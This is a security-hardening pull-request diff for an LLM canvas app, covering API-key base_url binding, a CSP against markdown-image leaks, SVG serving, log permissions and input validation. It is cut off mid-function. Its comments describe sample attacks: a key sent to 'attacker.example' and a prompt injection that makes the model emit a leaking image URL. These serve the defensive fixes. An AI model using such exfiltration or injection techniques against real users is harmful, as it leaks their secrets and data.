### PR TITLE
Security pass: 25 fixes across the full remaining audit backlog

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -133,7 +133,7 @@ jobs:
       # version skew - see that test's own module docstring for the CI
       # failure that proved the shell-out approach unusable.
       - name: Install dev tooling (pytest, ruff, mypy - CI-only, not in the prod lockfile)
-        run: pip install --quiet pytest pytest-cov ruff mypy
+        run: pip install --quiet pytest==9.1.1 pytest-cov==7.1.0 ruff==0.16.4 mypy==2.3.1
 
       - name: Compile check
         run: python -m compileall -q .
@@ -159,7 +159,7 @@ jobs:
         run: python -m pytest -q backend/tests/perf
 
       - name: pip-audit (known-vulnerability scan of the locked dependency set)
-        run: pip install --quiet pip-audit && python -m pip_audit -r requirements.txt
+        run: pip install --quiet pip-audit==2.10.1 && python -m pip_audit -r requirements.txt
 
   build-check:
     name: Build check (wheel builds, installs, and imports cleanly)
@@ -179,7 +179,7 @@ jobs:
           cache: pip
 
       - name: Install build tooling
-        run: pip install build twine
+        run: pip install build==1.5.0 twine==7.0.0
 
       - name: Build the wheel
         run: python -m build --wheel

--- a/backend/agents.py
+++ b/backend/agents.py
@@ -446,7 +446,12 @@ class AgentDispatcher:
             registry = ToolRegistry()
             register_graph_tools(registry, document)
             register_run_node_tool(registry, document, self)
-            register_knowledge_tools(registry)
+            # SECURITY-FIX: document scopes knowledge.search to THIS
+            # session's own current workspace - see that tool's own
+            # docstring (backend/tools_knowledge.py) for why an unscoped
+            # search tool handed to the model is a cross-workspace read
+            # primitive for prompt-injected content.
+            register_knowledge_tools(registry, document=document)
             register_builder_control_tools(registry)
             self._register_configured_mcp_tools(registry)
             self._register_plugin_tools(registry, document)

--- a/backend/agents.py
+++ b/backend/agents.py
@@ -453,6 +453,24 @@ class AgentDispatcher:
             self._builder_registry = registry
         return self._builder_registry
 
+    def invalidate_builder_registry(self) -> None:
+        """SECURITY-FIX: builder_tool_registry() above builds the registry
+        ONCE and caches it for this dispatcher's entire lifetime, with
+        nothing to invalidate it - so disabling or removing an MCP server,
+        or narrowing its enabled_tools/scopes/approval, in Settings had no
+        effect on a session whose Builder had already started once: the
+        cached registry (and the already-connected McpStdioClient in
+        self._mcp_clients) kept granting the OLD tools under the OLD scopes
+        for the rest of the session, silently outliving the setting meant to
+        revoke them. Called from the setMcpServers intent (backend/api/
+        intents_settings_general.py) right after a save, so the Builder's
+        NEXT start rebuilds from the just-persisted config. Deliberately
+        just a cache-clear, not a live teardown: an in-flight Builder run
+        keeps the registry (and MCP clients) it already bound - this only
+        stops a STALE registry from surviving past the settings change that
+        was supposed to retire it."""
+        self._builder_registry = None
+
     def _register_configured_mcp_tools(self, registry) -> None:
         """ADR-008 stage 8.5: ADR-007's deferred MCP runtime wiring lands in
         its designated consumer. Reads the persisted server list, connects

--- a/backend/api/intents_diagnostics.py
+++ b/backend/api/intents_diagnostics.py
@@ -43,6 +43,16 @@ def register_diagnostics_intents(
         directory.mkdir(parents=True, exist_ok=True)
         path = directory / f"bundle-{utcnow.strftime('%Y%m%dT%H%M%SZ')}.json"
         path.write_text(json.dumps(bundle, indent=2), encoding="utf-8")
+        # SECURITY-FIX (OBS-3): the bundle is built from this same document's
+        # state (backend/diagnostic_bundle.py's own redaction allowlist
+        # notwithstanding, it can still carry absolute paths) and, like
+        # graphlink.log and faulthandler.log, was previously created at the
+        # process umask with no chmod - the one uncovered case among the
+        # three ~/.graphlink file kinds that skip write_text's own
+        # permission control entirely. Reuses crash_recovery's own helper
+        # (already reached into via _data_dir() above) rather than
+        # duplicating the POSIX-only/log-and-swallow chmod idiom here.
+        crash_recovery._chmod_0600(path)
         return {"bundle": bundle, "path": str(path)}
 
     async def open_log_folder():

--- a/backend/api/intents_global_search.py
+++ b/backend/api/intents_global_search.py
@@ -106,10 +106,44 @@ def register_global_search_intents(bus: SessionBus) -> None:
         # filter, a real SELECT-or-INSERT), never called inline on the event
         # loop.
         def _search():
-            collection_id = (
-                get_or_create_workspace_collection(DEFAULT_DB_PATH, int(workspace_id))
-                if workspace_id is not None else None
-            )
+            collection_id = None
+            if workspace_id is not None:
+                try:
+                    candidate_workspace_id = int(workspace_id)
+                except (TypeError, ValueError):
+                    candidate_workspace_id = None
+                if candidate_workspace_id is not None:
+                    # SECURITY-FIX: get_or_create_workspace_collection is a
+                    # SELECT-or-INSERT with no existence check of its own -
+                    # calling it directly on a caller-supplied workspaceId
+                    # made this read-only intent into a persistent write
+                    # primitive that could grow the collections table
+                    # without bound for any integer, including workspace
+                    # ids that never existed in chats.db. Mirrors
+                    # chat_library.py's own newChat, which validates a
+                    # caller-supplied workspace id against get_all_workspaces
+                    # before using it: an unknown/stale id falls back to
+                    # "no filter" (global search) rather than minting a
+                    # collection row for a workspace that doesn't exist.
+                    #
+                    # Imported here, not at module top: backend.chat_library
+                    # imports backend.canvas (for SceneDocument), and
+                    # backend.canvas imports THIS module to register these
+                    # intents - a module-level import of backend.chat_library
+                    # here would be circular (confirmed by
+                    # test_chat_library_never_imports_qt's fresh-subprocess
+                    # import, the one place that circularity is actually
+                    # exercised).
+                    from backend.chat_library import DEFAULT_DB_PATH as CHAT_DB_PATH
+                    from backend.chat_library import get_all_workspaces
+
+                    existing_workspace_ids = {
+                        workspace["id"] for workspace in get_all_workspaces(CHAT_DB_PATH)
+                    }
+                    if candidate_workspace_id in existing_workspace_ids:
+                        collection_id = get_or_create_workspace_collection(
+                            DEFAULT_DB_PATH, candidate_workspace_id
+                        )
             return hybrid_search(DEFAULT_DB_PATH, query, k=k, collection_id=collection_id)
 
         results = await asyncio.to_thread(_search)

--- a/backend/api/intents_knowledge.py
+++ b/backend/api/intents_knowledge.py
@@ -31,7 +31,7 @@ _DEFAULT_K = 5
 _MAX_K = 25
 
 
-def _resolve_workspace_collection_id(document: SceneDocument) -> int:
+def _resolve_workspace_collection_id(document: SceneDocument, db_path=None) -> int:
     """ADR-020 stage 20.3: every real ingestion/search call in this module
     scopes to the CALLING SESSION's current workspace - see backend.
     knowledge_store.get_or_create_workspace_collection's own docstring for
@@ -45,6 +45,16 @@ def _resolve_workspace_collection_id(document: SceneDocument) -> int:
     undifferentiated pool every pre-20.3 build already used, rather than
     raising or guessing at some arbitrary workspace.
 
+    `db_path` defaults to this module's own DEFAULT_DB_PATH (every call
+    site in THIS file omits it, unchanged from before this parameter
+    existed) - added only so backend/tools_knowledge.py's
+    make_knowledge_search_handler, which already threads its own injectable
+    db_path through every other knowledge_store call it makes (see that
+    function's own docstring on why: test isolation, matching
+    knowledge_ingest.ingest_file's established "inject the path" pattern),
+    can reuse this SAME scoping logic against that same path rather than
+    silently resolving against the real default database.
+
     Real blocking SQLite I/O (a SELECT, or an INSERT the very first time a
     given workspace ever ingests/searches anything) - callers run this
     inside asyncio.to_thread, never inline on the event loop, same posture
@@ -53,7 +63,7 @@ def _resolve_workspace_collection_id(document: SceneDocument) -> int:
     workspace_id = document.current_workspace_id
     if workspace_id is None:
         return 0
-    return get_or_create_workspace_collection(DEFAULT_DB_PATH, workspace_id)
+    return get_or_create_workspace_collection(db_path if db_path is not None else DEFAULT_DB_PATH, workspace_id)
 
 
 def branch_history_to_text(history: list[dict]) -> str:

--- a/backend/api/intents_settings_api_provider.py
+++ b/backend/api/intents_settings_api_provider.py
@@ -97,11 +97,37 @@ def register_settings_api_provider_intents(
         # the plaintext key off the wire entirely.
         key = str(api_key).strip()
         if not key:
-            key = (
+            stored_key = (
                 manager.get_openai_key()
                 if provider == config.API_PROVIDER_OPENAI
                 else manager.get_anthropic_key()
             )
+            # SECURITY-FIX: only fall back to a STORED key when it's actually
+            # bound to the base_url this call is about to send it to. Without
+            # this, any caller of this intent - the SPA itself (so an
+            # XSS/prompt-injection foothold in canvas-rendered content), or a
+            # local process holding the per-launch token - could send
+            # api_key='', base_url='http://attacker.example/v1' and turn Load
+            # into a decrypt-and-exfiltrate oracle for the DPAPI-protected
+            # OpenAI-compatible key, without ever reading the encrypted blob
+            # itself: the stored key was never bound to the base_url it was
+            # saved with, only save_api_configuration's own separate "retype
+            # the key on a URL change" discipline enforced that in practice,
+            # and this intent bypasses it entirely by falling back server-
+            # side. Gated on stored_key being non-empty so the ordinary "no
+            # key configured anywhere" case still reports its own, more
+            # useful error below rather than this one. Anthropic has no
+            # user-configurable base_url (see _build_api_client - the branch
+            # ignores it outright), so the stored Anthropic key always ships
+            # to the same fixed host and needs no such check.
+            if stored_key and provider == config.API_PROVIDER_OPENAI and base_url != manager.get_api_base_url():
+                state.api_catalog_state[provider] = {
+                    "status": "error",
+                    "message": "Enter the API Key to test a different Base URL.",
+                }
+                await bus.publish("app-settings")
+                return
+            key = stored_key
         if not key:
             state.api_catalog_state[provider] = {"status": "error", "message": "Please enter the API Key."}
             await bus.publish("app-settings")

--- a/backend/api/intents_settings_api_provider.py
+++ b/backend/api/intents_settings_api_provider.py
@@ -39,6 +39,43 @@ from backend.notifications import NotificationState
 from graphlink_settings_store import KEEP_EXISTING_SECRET, SettingsManager
 
 
+def _resolve_stored_key_for_catalog_load(
+    manager: SettingsManager, provider: str, base_url: str
+) -> tuple[str, str | None]:
+    """SECURITY-FIX: resolve the effective API key for a catalog load whose
+    own key field arrived blank, and refuse the STORED-key fallback unless
+    that key is actually bound to the base_url this call is about to send it
+    to. Without the base_url check, any caller of the loadApiModels intent -
+    the SPA itself (so an XSS/prompt-injection foothold in canvas-rendered
+    content), or a local process holding the per-launch token - could send
+    api_key='', base_url='http://attacker.example/v1' and turn Load into a
+    decrypt-and-exfiltrate oracle for the DPAPI-protected OpenAI-compatible
+    key, without ever reading the encrypted blob itself: the stored key was
+    never bound to the base_url it was saved with, only save_api_configuration's
+    own separate "retype the key on a URL change" discipline enforced that,
+    and this intent bypasses it entirely by falling back server-side. Gated
+    on stored_key being non-empty so the ordinary "no key configured
+    anywhere" case still reports its own, more useful error at the call site
+    rather than this one. Anthropic has no user-configurable base_url (see
+    _build_api_client - the branch ignores it outright), so the stored
+    Anthropic key always ships to the same fixed host and needs no check.
+
+    Returns (key, error): a non-None `error` is a message to surface and
+    abort on; otherwise `key` is the resolved key (possibly "" when nothing
+    is stored, which the caller turns into its own "enter the API key"
+    error). Extracted to module level (not inlined in the load_api_models
+    closure) to keep register_settings_api_provider_intents under the
+    ADR-002 register-function line cap."""
+    stored_key = (
+        manager.get_openai_key()
+        if provider == config.API_PROVIDER_OPENAI
+        else manager.get_anthropic_key()
+    )
+    if stored_key and provider == config.API_PROVIDER_OPENAI and base_url != manager.get_api_base_url():
+        return "", "Enter the API Key to test a different Base URL."
+    return stored_key, None
+
+
 def register_settings_api_provider_intents(
     bus: SessionBus,
     manager: SettingsManager,
@@ -97,37 +134,15 @@ def register_settings_api_provider_intents(
         # the plaintext key off the wire entirely.
         key = str(api_key).strip()
         if not key:
-            stored_key = (
-                manager.get_openai_key()
-                if provider == config.API_PROVIDER_OPENAI
-                else manager.get_anthropic_key()
-            )
-            # SECURITY-FIX: only fall back to a STORED key when it's actually
-            # bound to the base_url this call is about to send it to. Without
-            # this, any caller of this intent - the SPA itself (so an
-            # XSS/prompt-injection foothold in canvas-rendered content), or a
-            # local process holding the per-launch token - could send
-            # api_key='', base_url='http://attacker.example/v1' and turn Load
-            # into a decrypt-and-exfiltrate oracle for the DPAPI-protected
-            # OpenAI-compatible key, without ever reading the encrypted blob
-            # itself: the stored key was never bound to the base_url it was
-            # saved with, only save_api_configuration's own separate "retype
-            # the key on a URL change" discipline enforced that in practice,
-            # and this intent bypasses it entirely by falling back server-
-            # side. Gated on stored_key being non-empty so the ordinary "no
-            # key configured anywhere" case still reports its own, more
-            # useful error below rather than this one. Anthropic has no
-            # user-configurable base_url (see _build_api_client - the branch
-            # ignores it outright), so the stored Anthropic key always ships
-            # to the same fixed host and needs no such check.
-            if stored_key and provider == config.API_PROVIDER_OPENAI and base_url != manager.get_api_base_url():
-                state.api_catalog_state[provider] = {
-                    "status": "error",
-                    "message": "Enter the API Key to test a different Base URL.",
-                }
+            # SECURITY-FIX: resolve the blank-key fallback through the helper,
+            # which refuses a stored key bound to a DIFFERENT base_url - see
+            # _resolve_stored_key_for_catalog_load's own docstring for the
+            # decrypt-and-exfiltrate oracle this closes.
+            key, base_url_error = _resolve_stored_key_for_catalog_load(manager, provider, base_url)
+            if base_url_error is not None:
+                state.api_catalog_state[provider] = {"status": "error", "message": base_url_error}
                 await bus.publish("app-settings")
                 return
-            key = stored_key
         if not key:
             state.api_catalog_state[provider] = {"status": "error", "message": "Please enter the API Key."}
             await bus.publish("app-settings")

--- a/backend/api/intents_settings_general.py
+++ b/backend/api/intents_settings_general.py
@@ -24,6 +24,7 @@ server patch.
 from __future__ import annotations
 
 import asyncio
+from typing import TYPE_CHECKING
 
 import graphlink_task_config as config
 
@@ -32,6 +33,9 @@ from backend.events import SessionBus
 from backend.notifications import NotificationState
 from backend.observability import apply_log_level
 from graphlink_settings_store import SettingsManager
+
+if TYPE_CHECKING:
+    from backend.agents import AgentDispatcher
 
 # ADR-006 stage 6.5: the three persisted provider-mode strings
 # apply_provider_mode dispatches on - the closed vocabulary setProviderMode
@@ -105,6 +109,7 @@ def register_settings_general_intents(
     manager: SettingsManager,
     state: SettingsSessionState,
     notifications: NotificationState | None = None,
+    agent_dispatcher: "AgentDispatcher | None" = None,
 ) -> None:
     # ADR-006 stage 6.5: notifications is optional (trailing, defaulted) so
     # the pre-6.5 tests that call register_settings_general_intents(bus,
@@ -228,6 +233,14 @@ def register_settings_general_intents(
                 await bus.publish("notification")
             return
         await asyncio.to_thread(run_locked, manager.set_mcp_servers, normalized)
+        # SECURITY-FIX: a Builder already started this session cached its
+        # ToolRegistry (and connected MCP clients) once and forever - see
+        # AgentDispatcher.invalidate_builder_registry's own docstring. Clear
+        # it on every save so a disabled/removed server, or a narrowed
+        # scope/approval, actually takes effect on the Builder's next run
+        # instead of silently staying live for the rest of the session.
+        if agent_dispatcher is not None:
+            agent_dispatcher.invalidate_builder_registry()
         await bus.publish("app-settings")
 
     bus.register_intent("app-settings", "setActiveSection", set_active_section)

--- a/backend/app.py
+++ b/backend/app.py
@@ -784,6 +784,19 @@ async def _handle_message(session: SessionBus, websocket: WebSocket, message: di
             )
             return
         for topic in topics:
+            # SECURITY-FIX: `topics` was checked to be a list, but not that
+            # each ELEMENT is a hashable/string topic name. A subscribe frame
+            # like {"topics": [{}]} passed the list check and reached
+            # send_snapshot -> self._topics.get(topic), which raised
+            # TypeError('unhashable type: dict') - not UnknownTopicError, so
+            # it escaped the except clause below uncaught and killed the
+            # connection, the exact "malformed input drops the socket"
+            # failure this function's own adjacent REVIEW-FIXes all close.
+            if not isinstance(topic, str):
+                await websocket.send_json(
+                    {"kind": "error", "id": msg_id, "error": "malformed message: each topic must be a string"}
+                )
+                continue
             try:
                 await session.send_snapshot(topic, websocket, request_id=msg_id)
             except UnknownTopicError:

--- a/backend/app.py
+++ b/backend/app.py
@@ -105,6 +105,33 @@ _LOOPBACK_HOST = "127.0.0.1"
 # already required, not a second env var for the same real workflow.
 DEV_WS_ORIGIN_ENV = "GRAPHLINK_DEV_WS_ORIGIN"
 
+# SECURITY-FIX (finding markdown-image-exfil): every text-bearing node
+# (Chat/Conversation/WebResearch/Artifact/...) renders LLM/web-authored
+# markdown through NodeMarkdown.tsx/DocumentViewMarkdown.tsx, whose `img`
+# override spreads a markdown-supplied `src` straight onto a real `<img>`.
+# react-markdown's own default urlTransform permits any http(s) URL by
+# design, and the browser fetches an `<img src>` automatically at RENDER
+# TIME - no click required, unlike the sibling `<a>` link path. A prompt
+# injection that steers the model into emitting
+# `![](https://attacker.example/x?leak=<data>)` therefore gets a silent,
+# automatic GET to an arbitrary attacker-chosen host the instant the node
+# renders. NodeMarkdown/DocumentViewMarkdown now also reject non-http(s)
+# `src` schemes the same way the existing SafeAnchor link guard does (see
+# those files), but neither can restrict WHICH http(s) host an image may
+# be fetched from - that is a network-layer decision, not a component-
+# level one. This CSP is that network-layer close: img-src 'self'
+# restricts image fetches to this app's own origin (covers the legitimate
+# /api/assets/{id} route), and 'data:' additionally covers html-to-image's
+# own internal `new Image()` load of a `data:image/svg+xml` document
+# during canvas PNG export (exportCanvasPng.ts) - confirmed as the only
+# `data:image` use anywhere in web_ui/src before adding it here. No other
+# directive is set: this app has shipped with NO Content-Security-Policy
+# at all until now, so a broader lockdown (default-src/script-src/etc.)
+# risks breaking the SPA's own legitimate script/style loading in ways
+# that cannot be verified without a real browser - deliberately scoped to
+# just the directive this finding is actually about.
+CONTENT_SECURITY_POLICY = "img-src 'self' data:"
+
 
 def _is_allowed_ws_origin(origin: str | None, host_header: str | None, dev_proxy_origin: str | None = None) -> bool:
     """Handshake-time allowlist for the /ws WebSocket Origin header.
@@ -738,8 +765,18 @@ def create_app(
         async def spa(full_path: str) -> FileResponse:
             candidate = (resolved_spa / full_path).resolve()
             if full_path and candidate.is_file() and candidate.is_relative_to(resolved_spa.resolve()):
-                return FileResponse(candidate)
-            return FileResponse(resolved_spa / "index.html")
+                response = FileResponse(candidate)
+            else:
+                response = FileResponse(resolved_spa / "index.html")
+            # SECURITY-FIX (markdown-image-exfil): see CONTENT_SECURITY_POLICY's
+            # own module-level comment above for the full mechanism this closes.
+            # Attached directly to the response object (this route's own two
+            # FileResponse branches are the only place the SPA document itself
+            # is served - unlike require_capability_token/require_loopback_origin
+            # above, which gate a shared set of paths uniformly, this header only
+            # ever needs to reach the document responses this handler returns).
+            response.headers["Content-Security-Policy"] = CONTENT_SECURITY_POLICY
+            return response
     else:
         logger.warning("SPA build not found at %s - only /api and /ws are served", resolved_spa)
 

--- a/backend/app.py
+++ b/backend/app.py
@@ -283,7 +283,7 @@ def _configure_session(
     # real banner (same load-bearing ordering precedent as register_plugins/
     # register_chat_library above - notifications_state already exists by
     # this point in every case).
-    register_settings(bus, settings_manager, notifications_state)
+    register_settings(bus, settings_manager, notifications_state, agent_dispatcher)
     # R6.4: register_chat_library needs the same session's canvas_document
     # (built above) so loadChat can actually restore a session into it, and
     # notifications_state so a failed/empty load can surface a real banner -

--- a/backend/asset_store.py
+++ b/backend/asset_store.py
@@ -60,7 +60,21 @@ _EXTENSION_BY_MIME = {
 # WS intent, session_load._restore_image_payload) validates mime_type
 # before storing it, so the read side is the one place that can close the
 # gap regardless of how a bad value got stored.
-ALLOWED_IMAGE_MIME_TYPES = frozenset(_EXTENSION_BY_MIME)
+#
+# SECURITY-FIX: image/svg+xml is deliberately EXCLUDED from this set even
+# though _EXTENSION_BY_MIME still maps it - SVG stays storable (and keeps
+# its real .svg extension for workspace_archive.py's export path), only
+# serving it back as Content-Type: image/svg+xml is what this closes. An
+# SVG document can carry a <script> tag; get_asset trusts a mime_type it
+# never validated at either write path straight into the response's
+# Content-Type when that value is in this set, so a stored SVG used to come
+# back as genuinely active content at this app's own origin - inert today
+# behind an <img src> consumer, but a same-origin XSS with access to every
+# /api intent (including code-execution approval) the moment anything loads
+# an asset URL as a top-level document/iframe instead. get_asset already
+# falls back every mime_type NOT in this set to application/octet-stream,
+# so removing svg+xml here is sufficient on its own to close the gap.
+ALLOWED_IMAGE_MIME_TYPES = frozenset(_EXTENSION_BY_MIME) - {"image/svg+xml"}
 
 
 def content_ref(data: bytes) -> str:

--- a/backend/assets.py
+++ b/backend/assets.py
@@ -47,7 +47,7 @@ import re
 from fastapi import FastAPI, Response
 from fastapi.responses import JSONResponse
 
-from backend.asset_store import ALLOWED_IMAGE_MIME_TYPES
+from backend.asset_store import ALLOWED_IMAGE_MIME_TYPES, extension_for_mime
 from backend.events import EventBus, UnknownSessionError
 from backend.session_context import get_session_context
 from graphlink_chart_rendering import render_chart_png, render_chart_svg
@@ -107,10 +107,28 @@ def register_assets(app: FastAPI, bus: EventBus) -> None:
         # caller-supplied mime_type, session_load._restore_image_payload's
         # payload-supplied mime_type) validates the string before storing
         # it, so it is not trustworthy here - pass it through only if it is
-        # one of this app's own real image types.
+        # one of this app's own real image types. ALLOWED_IMAGE_MIME_TYPES
+        # excludes image/svg+xml (see asset_store.py's SECURITY-FIX comment
+        # on that set) so a stored SVG lands in the octet-stream fallback
+        # below same as any other untrusted mime_type.
         if mime_type not in ALLOWED_IMAGE_MIME_TYPES:
             mime_type = _FALLBACK_MIME_TYPE
-        return Response(content=image_bytes, media_type=mime_type)
+        # SECURITY-FIX: this route used to set neither header at all. nosniff
+        # stops a browser from content-sniffing these bytes into something
+        # more dangerous than the declared Content-Type regardless of what
+        # mime_type ends up being; Content-Disposition: inline (still
+        # renders in an <img src>/fetch consumer, unlike "attachment") names
+        # a real extension explicitly instead of leaving a future top-level-
+        # document/iframe consumer to guess from the bytes themselves.
+        extension = extension_for_mime(mime_type)
+        return Response(
+            content=image_bytes,
+            media_type=mime_type,
+            headers={
+                "X-Content-Type-Options": "nosniff",
+                "Content-Disposition": f'inline; filename="{asset_id}.{extension}"',
+            },
+        )
 
     @app.get("/api/assets/chart/{node_id}/export")
     async def export_chart(node_id: str, session: str = "default", fmt: str = "png") -> Response:

--- a/backend/chat_library.py
+++ b/backend/chat_library.py
@@ -1122,24 +1122,44 @@ def get_all_chats(db_path: Path, notifications: NotificationState | None = None)
         ).fetchall()
     tags_by_graph_id: dict[int, list[str]] = {}
     for graph_id, tag_name in tag_rows:
-        tags_by_graph_id.setdefault(int(graph_id), []).append(str(tag_name))
-    return [
-        {
-            "id": int(row[0]),
-            "title": str(row[1]),
-            "createdLabel": _format_timestamp(row[2]),
-            "updatedLabel": _format_timestamp(row[3]),
-            "createdAtIso": _format_timestamp_iso(row[2]),
-            "updatedAtIso": _format_timestamp_iso(row[3]),
-            "preview": str(row[4] or ""),
-            "messageCount": int(row[5] or 0),
-            "workspaceId": int(row[6]),
-            "favorite": bool(row[7]),
-            "archived": bool(row[8]),
-            "tags": tags_by_graph_id.get(int(row[0]), []),
-        }
-        for row in rows
-    ]
+        try:
+            tags_by_graph_id.setdefault(int(graph_id), []).append(str(tag_name))
+        except (TypeError, ValueError):
+            continue
+    # SECURITY-FIX: SQLite's type affinity does NOT enforce that an INTEGER
+    # column actually holds a number - a hand-corrupted or hostile chats.db
+    # can store non-numeric TEXT in id/message_count/workspace_id, and
+    # int(...) raised an uncaught ValueError, escaping get_all_chats
+    # entirely. That crash was not a one-time load failure: this function
+    # backs the "app-chat-library" topic, republished on essentially every
+    # user action in this module (rename/delete/save/load/new-chat, every
+    # fresh subscribe) - one corrupt row killed the whole library listing
+    # on every single one of those, not just an initial open. A single bad
+    # row is now skipped (logged) rather than taking every other real,
+    # well-formed graph down with it - the same "malformed entries dropped,
+    # not raised on" posture the settings store already uses.
+    results: list[dict[str, Any]] = []
+    for row in rows:
+        try:
+            row_id = int(row[0])
+            results.append({
+                "id": row_id,
+                "title": str(row[1]),
+                "createdLabel": _format_timestamp(row[2]),
+                "updatedLabel": _format_timestamp(row[3]),
+                "createdAtIso": _format_timestamp_iso(row[2]),
+                "updatedAtIso": _format_timestamp_iso(row[3]),
+                "preview": str(row[4] or ""),
+                "messageCount": int(row[5] or 0),
+                "workspaceId": int(row[6]),
+                "favorite": bool(row[7]),
+                "archived": bool(row[8]),
+                "tags": tags_by_graph_id.get(row_id, []),
+            })
+        except (TypeError, ValueError):
+            logger.exception("get_all_chats: skipping a graph row with a malformed numeric field")
+            continue
+    return results
 
 
 def rename_chat(

--- a/backend/crash_recovery.py
+++ b/backend/crash_recovery.py
@@ -74,6 +74,8 @@ from pathlib import Path
 from backend.notifications import NotificationState
 from backend.observability import JsonLogFormatter
 
+logger = logging.getLogger(__name__)
+
 _LOG_MAX_BYTES = 2 * 1024 * 1024
 _LOG_BACKUP_COUNT = 3
 _LOG_FORMAT = "%(asctime)s %(levelname)s %(name)s: %(message)s"
@@ -105,6 +107,49 @@ def crash_dir(base_dir: Path | str | None = None) -> Path:
     return _data_dir(base_dir) / "crash"
 
 
+def _chmod_0600(path: Path) -> None:
+    """SECURITY-FIX (OBS-3): best-effort POSIX 0600 tightening for a file
+    that can carry chat content or absolute paths, mirroring the exact
+    chmod idiom already used everywhere else in this codebase for files
+    like this (graphlink_settings_store.py's session.dat,
+    backend/chat_library.py's chats.db and its WAL sidecars,
+    graphlink_scratch_dirs.py's prepare_scratch_dir) - graphlink.log,
+    faulthandler.log, and the diagnostic bundle JSON were the one remaining
+    exception. No-op on Windows (os.chmod there only ever toggles the
+    read-only attribute, never real ACLs - the user's own profile ACLs are
+    the actual access control there). A refused chmod is logged and
+    swallowed, never raised: a permissions tightening that can't be applied
+    must not crash logging/diagnostics themselves. Reused directly by
+    backend/api/intents_diagnostics.py for the bundle file, the same way
+    that module already reaches into this one's _data_dir()."""
+    if sys.platform == "win32":
+        return
+    try:
+        os.chmod(path, 0o600)
+    except OSError:
+        logger.warning("could not chmod %s to 0600 - continuing with existing permissions", path)
+
+
+class _Chmod0600RotatingFileHandler(logging.handlers.RotatingFileHandler):
+    """SECURITY-FIX (OBS-3): plain RotatingFileHandler opens every file it
+    ever touches (the initial graphlink.log AND each rotated-open that
+    doRollover triggers) via the stdlib's unguarded open(), subject to the
+    process umask each time - chmod'ing the handler once at construction
+    only covers the first file. doRollover itself renames the current log
+    down the chain (graphlink.log -> .1 -> .2 -> .3, oldest discarded) and
+    then reopens a BRAND NEW file at the original path; the renamed-away
+    .1/.2/.3 copies need no extra treatment since POSIX rename preserves
+    the source inode's mode bits (same reasoning backend/chat_library.py's
+    corrupt-db quarantine rename already relies on) - so as long as the
+    active file was 0600 before rotation, every file it rotates into stays
+    0600 automatically. Only the freshly reopened current file needs a new
+    chmod after each rollover, which is all this override adds."""
+
+    def doRollover(self) -> None:
+        super().doRollover()
+        _chmod_0600(Path(self.baseFilename))
+
+
 def configure_logging(base_dir: Path | str | None = None, level: int = logging.INFO) -> None:
     """Attach a rotating file handler to the root logger. Idempotent - later
     calls are no-ops so handlers are never duplicated across a process's
@@ -119,9 +164,23 @@ def configure_logging(base_dir: Path | str | None = None, level: int = logging.I
 
     formatter = logging.Formatter(_LOG_FORMAT)
 
-    handler = logging.handlers.RotatingFileHandler(
+    handler = _Chmod0600RotatingFileHandler(
         resolved, maxBytes=_LOG_MAX_BYTES, backupCount=_LOG_BACKUP_COUNT, encoding="utf-8",
     )
+    # SECURITY-FIX (OBS-3): this file can hold chat content and absolute
+    # paths (per this module's own docstring and the many
+    # logger.exception()/logger.error() call sites this handler collects
+    # from across backend/), so it needs the same 0600 tightening every
+    # OTHER file in ~/.graphlink that can carry user content already gets.
+    # Runs on every real call, not just when the file is first created -
+    # this function is itself idempotent per-PROCESS only, so a fresh
+    # process re-attaching to an already-existing graphlink.log (the normal
+    # case on every launch after the first) still self-heals its
+    # permissions here, same "self-heal on every launch" posture
+    # graphlink_settings_store.py's SettingsManager.__init__ already takes
+    # for session.dat. Rotation-created files are covered separately by
+    # _Chmod0600RotatingFileHandler.doRollover above.
+    _chmod_0600(resolved)
     # ADR-016 stage 16.1: the file is JSON-lines (one JSON object per line,
     # with run_id/session/kind/node_id when a call site supplies them via
     # extra=) so it is machine-parseable - by the diagnostics bundle builder
@@ -163,7 +222,13 @@ def install_exception_handlers(base_dir: Path | str | None = None) -> None:
 
     directory = crash_dir(base_dir)
     directory.mkdir(parents=True, exist_ok=True)
-    _faulthandler_file = open(directory / "faulthandler.log", "a", encoding="utf-8")
+    faulthandler_path = directory / "faulthandler.log"
+    _faulthandler_file = open(faulthandler_path, "a", encoding="utf-8")
+    # SECURITY-FIX (OBS-3): native/segfault tracebacks can embed the same
+    # absolute paths and in-flight state as graphlink.log - same 0600
+    # tightening as that file, applied right after open() creates it (or
+    # confirms it already exists) so there's no window at the default umask.
+    _chmod_0600(faulthandler_path)
     faulthandler.enable(file=_faulthandler_file)
 
     crash_logger = logging.getLogger("graphlink.crash")

--- a/backend/events.py
+++ b/backend/events.py
@@ -841,6 +841,21 @@ class SessionBus:
             errors = _validate_intent_args(registration.args_schema, args)
             if errors:
                 raise IntentValidationError(errors)
+        elif not isinstance(args, list):
+            # SECURITY-FIX: a schema'd intent already gets this exact check
+            # via _validate_intent_args above; an intent with NO schema
+            # (args_schema=None - most of them) skipped it entirely and
+            # `handler(*args)` unpacked whatever shape the client sent.
+            # Python star-unpacks a str by character and a dict by key, so a
+            # non-list args (e.g. a bare string) reached an *args/single-
+            # string-parameter handler as silently mangled positional values
+            # instead of the validation error a schema'd intent would raise
+            # for the identical mistake - a protocol-hardening gap that
+            # would otherwise re-open per-handler as intents are added.
+            # Reusing IntentValidationError's own message shape keeps every
+            # intent's malformed-args behavior identical regardless of
+            # whether it has a schema.
+            raise IntentValidationError([f"expected a list of arguments, got {type(args).__name__}"])
         handler = registration.handler
         if inspect.iscoroutinefunction(handler):
             return await handler(*args)

--- a/backend/knowledge_store.py
+++ b/backend/knowledge_store.py
@@ -1066,6 +1066,19 @@ def list_embeddings_for_search(
 # -- FTS5 lexical search (ADR-017 stage 17.2) --------------------------------
 
 
+# SECURITY-FIX: FTS5 MATCH cost over the implicit-AND phrase list grows
+# quadratically with the number of quoted terms - measured 93s of CPU on
+# one worker thread (holding a knowledge.db connection the whole time) for
+# a single 200k-term/1.5MB query, and the query text is never length-
+# bounded anywhere on any of its three entry paths (the globalSearch/search
+# and knowledge/search WS intents, and the auto-approved LLM tool
+# knowledge.search - none of them cap `query`, only `k`). Capping the TERM
+# COUNT here, in the one function every caller funnels through, bounds the
+# actual cost driver regardless of how a caller's text is separated, well
+# below where the measured blowup even starts (50k terms was already 2.4s).
+_MAX_FTS5_QUERY_TERMS = 256
+
+
 def _fts5_match_expression(query: str) -> str:
     """Turns free-form user text into a safe FTS5 MATCH expression: every
     \\w+ token double-quoted (an FTS5 string literal, immune to the
@@ -1073,8 +1086,12 @@ def _fts5_match_expression(query: str) -> str:
